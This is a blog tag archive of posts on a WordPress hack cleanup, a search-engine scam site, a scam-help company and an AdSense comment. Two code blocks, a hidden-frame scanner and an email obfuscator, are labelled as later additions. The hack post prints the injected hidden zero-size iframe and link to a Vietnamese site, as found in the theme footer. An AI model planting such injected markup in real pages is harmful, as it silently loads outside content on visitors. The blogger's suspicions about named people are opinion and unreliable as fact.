Tag Archive: Source Code

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers, but for some days now Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn…”.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various network connections open on one’s PC.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area) fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230.  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above.

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was, and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam.)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine.  But to be sure, I downloaded a fresh copy of the theme and checked its footer file – it’s clean!  I then uploaded the whole clean Suffusion theme in its entirety, just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
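A way to check theme files for this kind of injection, as an added example that is not part of the original post or of the Suffusion theme: it flags off-site links and zero-size or CSS-hidden iframes. The site name comes from this post; the footer is a constructed sample modelled on the injected markup quoted above.

```javascript
// Added example, not the post's or Suffusion's own code: scan a theme file such as
// footer.php for the kind of injection found above, i.e. an <iframe> with zero size
// or an <a> link that points off-site. OWN_HOSTS and SAMPLE_FOOTER are assumptions:
// the site is the one named in the post, the footer is a constructed sample modelled
// on the injected markup quoted above.
const OWN_HOSTS = new Set(['strangelyperfect.tv', 'www.strangelyperfect.tv']);

const SAMPLE_FOOTER = `<div id="footer">Powered by WordPress</div>
<a href="http://www.strangelyperfect.tv/about/">About</a>
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen">Quang cao truc tuyen</a>
<iframe marginWidth="0" frameBorder="0" width="0" height="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>`;

// Pull name="value" / name='value' / name=value / bare-name attributes out of a tag body.
function parseAttrs(tagBody) {
  const attrs = {};
  const re = /([A-Za-z][\w-]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Hostname of an absolute URL, or null for relative links and unparsable values.
function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// Return every <a> or <iframe> whose target is not one of our own hosts, with the
// reasons it looks suspicious and the 1-based line it sits on. Relative links and
// links to OWN_HOSTS are ignored. (A '>' inside an attribute value would cut the
// tag short; good enough for theme files, not a general HTML parser.)
function findSuspiciousTags(html, ownHosts = OWN_HOSTS) {
  const findings = [];
  const tagRe = /<(iframe|a)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrs = parseAttrs(m[2]);
    const host = hostOf(tag === 'iframe' ? attrs.src : attrs.href);
    if (host === null || ownHosts.has(host)) continue;
    const reasons = [`points off-site to ${host}`];
    if (tag === 'iframe') {
      const isZero = v => v !== undefined && parseInt(v, 10) === 0;
      if (isZero(attrs.width) || isZero(attrs.height)) reasons.push('zero-size (hidden) frame');
      if (/display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || '')) reasons.push('hidden via CSS');
    }
    const line = html.slice(0, m.index).split('\n').length;
    findings.push({ tag, host, line, reasons });
  }
  return findings;
}

for (const f of findSuspiciousTags(SAMPLE_FOOTER)) {
  console.log(`line ${f.line}: <${f.tag}> ${f.reasons.join('; ')}`);
}
```

Run it over each file of the theme (footer.php, header.php, functions.php) rather than only the rendered homepage, since a dormant copy in another file would not show in the page source.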

A recheck on Sucuri shows my website to be okay now.  See screendump below.  I’ll be using Sucuri a lot more!

Sucuri Site Check


Windows Defrag to News 9 Today Browser Scam

Free Windows Defragmenter Search

Take this for a scam and a half way of fixing the Google search results!

Defrag Search Results

Today I was looking for an old defrag program, but couldn’t remember the name – so I went to Google.  That’s the screenshot on the right.

The second result looked promising.  After all, the text says,

Anyone know what is currently the best defragmenter for Windows 7 x64 64 bit, and why? Does it have any problems?

News 9 Today  (news9today.org)

News9 Today

Unfortunately, tehparadox.com is not all it seems.  The page actually referenced is http://tehparadox.com/forum/f85/best-defragmenter-windows-7-x64-452359/, which looks kosher enough, but it has nothing at all to do with disc defragmenters, and everything to do with get rich quick schemes!! (That is a screenshot on the left).

It’s like all the other fake news sites that we’ve seen recently, except in this case, the whole meta data of the website is built to deceive the search engines!

For instance, the title stays in the browser tabs, saying,

“Best defragmenter for Windows 7 x64 64 bit?”

The whole html source code is here.  You’ll see that the meta data bit reads:

name="keywords" content="Best,defragmenter,Windows,7,x64,64,bit, Best defragmenter for Windows 7 x64 64 bit?, downloads,free,resources,online,sharing,community,movies,games,720p,1080p,anime,applications,music,tv shows,e-books,comic books,discussions,warez,dvdr,rapidshare,megaupload,netload,hotfile,fileserve,filesonic"

name="description" content="Anyone know what is currently the best defragmenter for Windows 7 x64 64 bit, and why? Does it have any problems? Or should I just use the default one that comes with Windows 7? Thanks."

Where Does it Point?

The links all go to

https://ssl.clickbank.net/order/restricted.html?errCode=accntstate&cbhopvendor=homejonlin

which then redirects to

http://www.home-online-jobs.org/check-positions-available/?hop=maspromo

WHOIS www.home-online-jobs.org

Well, they’re hidden of course.  You should know what I think of businesses that choose to be anonymous, but to repeat, I think they’re shite.  See http://whois.domaintools.com/home-online-jobs.org for their “details”.

Noticeably, they have very peculiar name servers:

Name Server:NS1.MYHOMEWEALTHSYSTEM.COM

Name Server:NS2.MYHOMEWEALTHSYSTEM.COM

MYHOMEWEALTHSYSTEM.COM

This bunch of jokers are also hidden, see http://whois.domaintools.com/myhomewealthsystem.com, but they do have an actual web page promoting much the same stuff.  This has been seriously debunked by Paul at WorkAtHomeTruth here back in March 2010.  He has more red flags than the semaphore kid going on it.

The Biggest Killer Laugh of All

News9 Today Small Print

MyHomeWealthSystem at least has a web page.

Now go back to the top and examine News9Today.  Down at the bottom of their small print, they say:

Copyright 2010 © News9Today.org All Rights Reserved.

Hmm?  A website URL.  I wonder what it looks like?

Well actually, if you can recall the CNN logos at the top of the page, like so (directly from their server):


As seen on CNN? Ha Ha!

After getting the link to the header image above which is sourced from http://www.news9today.org/home-job-news/index_files/features16.jpg, I back-spaced to go back to the News9 Today page – and ended up on the tehparadox page here:  http://tehparadox.com/forum/f85/best-defragmenter-windows-7-x64-452359/

You see in the screenshot that the top advert is a “Google Is Hiring” scam advert?  Where does it go?

A. Well http://www.news9today.org/home-online-job-positions/?tid=hojab6 of course!

Conclusion

Somehow the browser has been redirected from the Google search page to the header advert from the tehparadox website.  This could be SQL injection or a bug in their server or my browser setup.

Whatever, this really stinks, and it’s a new thing to be wary about.


ScamVictimHelp.com, Poacher turned Gamekeeper?

Introduction

Poacher turned Gamekeeper


Poacher or Gamekeeper?

I’ve been following by RSS a little thread where a job-seeking homeworker has been diddled out of thousands – see Saundrak’s Blog. It seems to have close ties to Pacific Webworks et al, maybe not directly, but the Golf Course, techniques, or something.

Read this curious comment from someone called mlwood79 that just doesn’t look right to me, following my experiences with the scammers double-bluff etc in the old Google Treasure Chest scam.

Tracing mlwood79?

It’s not hard and doesn’t take long.  Despite not leaving any open invitation, Matt Wood leaves his email and phone number here, http://mlwood79.blogspot.co.uk/, a single post on the free blogger web.

A similar search on the 877-725-8882 phone number pulls out something interesting.  For instance, there are these postings on various consumer/scam forums:

www.scamvictimhelp.com

Very quickly we end up at scamvictimhelp.com from these few links above.  They provide a fair bit of information.


Another Scam or Two?

scamvictimhelp.com is a very plush and professional looking site, with an opening video that put the collywobbles up me after my Robert G Allen experiences and the various Robert Millar video offerings (see here for instance).

But the wordage is re-assuring enough, textually and on the video.  They seem to be White Knights, offering help to people who’ve been scammed by the recent splurge of Google/Tree/Credit stuff.

(On the subject of White Knights, Paul at WorkAtHomeTruth has had a separate rant that hints at the scammer’s double-bluffing we’ve previously observed.  Their new twists around old habits know no bounds!  Either that or piss-poor altruism.)  Who was it who said ‘eternal vigilance’?

Q. So Who are ScamVictimHelp.com?

A. Now there’s the rub!  USA folks will know the 877 phone number is non-geographic and a free-phone (see phone info).  The contact on the website is (like this one), a simple contact form.  So I don’t know where they are, from that! Hmm?

Q. So WHOIS ScamvictimHelp.com?

A. And there’s another rub!  Their name is ‘protected’ just like the scammers’, by Domains by Proxy, Inc. So I don’t know where they are from that! This facility is ‘supposed’ to be used to “protect individuals from spam”, but the reality for me is that,

if someone, offering a service, wants to hide their identity, then they’re up to no good!!!

Other Inconsistencies

So we see they want to hide themselves.   But from examining their website and some other forum postings (a weird way to advertise, is it not?), I’ve got three email contacts for the company:

  • Matt Wood – [email protected]
  • via spam reported here[email protected]
  • same email address is on http://www.scamvictimhelp.com/ homepage
  • Tyler Jackson – [email protected]

This means that they’re hiding their details not because they don’t want to be spammed, but for another reason.

By the way, I use email obfuscation on this website provided by Mike Greenberg’s phpEnkoder, which makes it almost impossible for content-scraping robots to harvest email addresses for spam purposes.  Many sites use a similar technique, but looking at their page source code, scamvictimhelp just use the simple mailto: HTML directive, which means that their email addresses can be harvested.  But since the main one arrived in someone’s spam anyway, they obviously don’t care about that.

You’ve got to really question their motives now…

Q. But What About ScamVictimHelp.com?

A. Well the best thing is to quote their stuff straight from their ‘About’ page (my emphasis below)…

We at ScamVictimHelp.com have a combined work experience of 25 years in the work-from-home/home based business industry. We have owned and operated back end telesales call centers for the majority of those years. Selling products, services, and personal coaching, designed to teach people how to make money from home through the internet, vending, stock market investing, real estate, and everything else in between. In which, we generated over 30 million dollars in sales revenue.

So they are a sales force organisation!  And I still don’t know where they are from that! Like I said at the beginning, poacher turned gamekeeper?  hmm…?  (Ironically, my original hook into this, Saundrak,  was because she was conned by a ‘personal coaching service’!!)

The best bit is in their very short Terms page.  Basically, they’ve stripped out all the reams of disclaimers and obfuscated money arrangements from the usual scammer T&Cs, and said that if you do happen to take up an offer from the website, all the results are from your work, and they can’t be blamed for anything…   the key scammer phrase of ‘opportunity seeker’ also pops up, like a bent penny.   Look! ….here’s what they say, so make up your own mind:

Any business opportunity related programs approved or recommended by Scam Victim Help.com, LLC on this site still require a sincere effort and patience on the part of the opportunity seeker. Since your results depend on the effort you apply to your business; individual results may vary

And I still don’t know where they are from that! Is this still poacher turned gamekeeper?  hmmm…?

Conclusion

If you’ve read some of the links listed above, you’ll have gathered that there’s a lot of uncertainty about this company.  Currently, from my limited research, no-one seems prepared to say right out that they’re up to no good.

But for my money, unless I start seeing some very positive reports and a lot more openness, I’d need a very large bargepole before I’d approach them.  Now where do you get barge-poles…?  Ha Ha.

Update 3 Nov 2009

Send in the Clones

The Vowells mentioned in the comments below have a host of businesses and put a lot into their local community.  Apart from the permanently dead car sales place previously at http://www.stgeorgechamber.com/New%20Members/executive.car.sales.htm, they have oil wells in Texas and a never-ending supply of internet-based ideas, like we’ve found.  Their former business www.oilinvestorsonline.com seems to be no more, at least in the internet world.

Whois Capital Energy Corp

Capital Energy Corp is still going though, and, unusually, unlike the St George Runners Baseball team who’ve cloaked their identity behind DomainsByProxy, are still visible to a WHOIS query!

Whois Intelligent Marketing

Curiously, since I checked a month or two back on the Baseball website, a lot of contact details have disappeared from the website.  I can understand the Vowells’ reasons….

But hey-ho.  There’s another Todd Vowell at a company called www.intelligentmarketing.com, in Cally-Forny-I-A!  But y’know, it may not be the same guy (Paul at WorkAtHomeTruth always treats such info with circumspection, as he says in the comments below), but it’s quite a coincidence, especially since my OpenDNS blocked the website right off because it’s classified as “Adware”!

Use OpenDNS
Same as this link here about a business disagreement…


Test of PHPEnkoder

Strangely posted on May 16th, 2009
Posted in Technology

PHPEnkoder is a port of the excellent Hivelogic Enkoder to PHP and, more specifically, to WordPress. It is used to display text in a way that users can see and bots can’t.

The encoding system is directly and unabashedly stolen from the BSD-licensed source of Hivelogic Enkoder, which works by randomly encoding a piece of text and sending to the browser self-evaluating Javascript that will generate the original text. This works in two ways: first, a bot must first have a fairly complete Javascript implementation; second, the decoding process can be made arbitrarily computationally intensive. This is similar to the idea of charging computational payments to send e-mail, only this is actually implemented.

email address could be here.  The plugin obfuscates it with JavaScript.  It works well and as designed, hiding the email address in the page source code but showing it to JavaScript enabled browsers.  So I’m leaving it in for now to protect the odd person who floats their email address into comments….
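A minimal Enkoder-style obfuscator, as an added example that is neither PHPEnkoder’s nor Hivelogic Enkoder’s own code, covering the mechanism described in the plugin blurb above and in the ScamVictimHelp post: the address (a constructed sample) is wrapped in layers of self-decoding JavaScript, so the raw page source holds only hex while a JavaScript-capable browser recovers the mailto: link.

```javascript
// Added example, not PHPEnkoder's or Hivelogic Enkoder's own code: a minimal
// Enkoder-style obfuscator. enkode() wraps the text in `rounds` layers, each a
// randomly keyed byte shift plus the JavaScript that undoes it and eval()s the
// layer beneath, so only a JS-capable client recovers the address and a scraper
// reading raw source sees hex. EMAIL is a constructed sample; Math.random is
// enough here because the key is meant to defeat scrapers, not to keep a secret.

// Shift every byte of a Latin-1 string by `key` (mod 256) and hex-encode it.
function shiftHex(str, key) {
  let hex = '';
  for (const ch of str) {
    const code = ch.codePointAt(0);
    if (code > 255) throw new Error('Latin-1 text only in this example');
    hex += ((code + key) % 256).toString(16).padStart(2, '0');
  }
  return hex;
}

// Build a self-decoding JavaScript expression that evaluates to `text`.
// Each extra round is one more eval a bot must actually execute.
function enkode(text, rounds = 3) {
  let expr = JSON.stringify(text);          // innermost layer: a string literal
  for (let r = 0; r < rounds; r++) {
    const key = 1 + Math.floor(Math.random() * 255);   // 1..255
    const hex = shiftHex(expr, key);
    expr = '(function(){var h="' + hex + '",s="";' +
      'for(var i=0;i<h.length;i+=2)s+=String.fromCharCode((parseInt(h.substr(i,2),16)-' + key + '+256)%256);' +
      'return eval(s);})()';
  }
  return expr;
}

// What a plugin of this kind would emit in place of a plain mailto: link.
function renderMailto(email, rounds = 3) {
  const link = '<a href="mailto:' + email + '">' + email + '</a>';
  return '<script>document.write(' + enkode(link, rounds) + ');</script>';
}

// What a JavaScript-capable browser effectively does with the snippet.
function dekode(snippet) {
  return new Function('return ' + snippet)();
}

const EMAIL = '[email protected]';   // constructed sample address
console.log(renderMailto(EMAIL, 2));   // hex-only markup: no '@' in the page source
console.log(dekode(enkode(EMAIL)));    // the original address
```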

I’ve taken my spammer’s email honeypot address away.


Google Treasure Chest, or Kit, and Mysterious ‘Help’ from a Stranger

Pre-Script

Comments are now closed on this posting as Google Treasure Chest is dead.
However, the problem has not gone away – the menace continues.

For further information, all chat on this and subsequent scams is now here:
Google Revolution, Different Name, Same Scam!
and here:
More on Google Profits and Pacific Webworks/

Google Treasure Chest

The saga that is Google Treasure Chest in all its various incarnations took an unusual turn the other day and it’s only now I’ve got round to writing about it.  For completeness, this is part of the story documented in these three links (and the shrapnel emanating!)

Google Adsense

The unusual problem is to do with this comment on the Google Treasure Chest – it’s a scam and a half! posting.

http://strangelyperfect.tv/3099/google-treasure-chest-its-a-scam-and-a-half/#comment-1176

It’s from a guy named ‘jeff’.  The IP address is put down as somewhere in Alaska and the email address is a gmail.com one.  The problem is the wordage and content of the comment, because notionally it looks okay.  It says:

Strangely Perfect has a link to this scam:
googleads.g.doubleclick.net/aclk?sa=l&ai=BztmIm33nSc_wF5uorAPAz9S1ApethJcBx4WBrwzAjbcB4L40EAEYAiCPg6QOKAI4AFC7seKP
_v____8BYMnmp4a0o6AXoAGdjMruA7IBE3N0cmFuZ2VseXBlcmZlY3QudHa6AQk0Njh4NjBfYXP
IAQHaAUxodHRwOi8vc3RyYW5nZWx5cGVyZmVjdC50di8zMDk5L2dvb2dsZS10cmVhc3VyZS1j
aGVzdC1pdHMtYS1zY2FtLWFuZC1hLWhhbGYv4AECqQK39pSQk9irPqgDAcgDB-gDYegDyAL1A
wAAAAT1AwBAAAA&num=2&sig=AGiWqty_8Dkk4B5fCXsxHe4HgUcV1MOm5w
&client=ca-pub-0574746273596969&adurl=http://www.trackednet.com/statistics/ngm/&nm=33

I’ve stripped off the ‘http’ and added carriage returns to the query string, otherwise it shoots right across the page, and even worse, it would allow the link to run.

What’s interesting is that somehow ‘jeff’ has managed (or bothered?) to add an AdSense link with my Google AdSense reference number.  Now this isn’t hard to find.  Check the source code for any of my pages and they’ll all contain the code, as a Google ad is on every page since they are in the sidebar.

In other words – it’s not rocket science.

But why would someone want to do that?  The actual text is “Strangely Perfect has a link to this scam”, followed by a link.

But the comment is on the actual post where the actual Google Treasure Chest scam is dug into.

  • Q.  So where does the actual link point to?
  • A.  Not where you think – is the answer!

The end URL, http://www.trackednet.com/statistics/ngm/&nm=33 is a 404 dead end.  The front query string is also dead.  Only when the link is clicked (and I’m credited, bizarrely), does the link take you anywhere and that place is a redirect from trackednet.com via a ‘Go’ page to:

http://www.entrepreneur.com/topic/home-based-business

This is a California based company and is in a very nice glazed building off the San Diego Freeway.

Confused

So I’m a trifle confused.  What’s this comment doing on the post?  It’s a kind of self-referential hell.  Is it a mistake by ‘jeff’ who posted the comment on the wrong website?  Is it part of a link duffing-up process?  Is it people posting extra links back to their site on popular posts to ensure the link stands out and isn’t in with the normal bunch of links?

When ‘jeff’ said “Strangely Perfect has a link to this scam”, it’s as if he’s copied a link from my sidebar adverts and pasted it into a comment.  I hope it’s a genuine mistake and not some new ‘thing’ that I’m at present unaware of!


© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me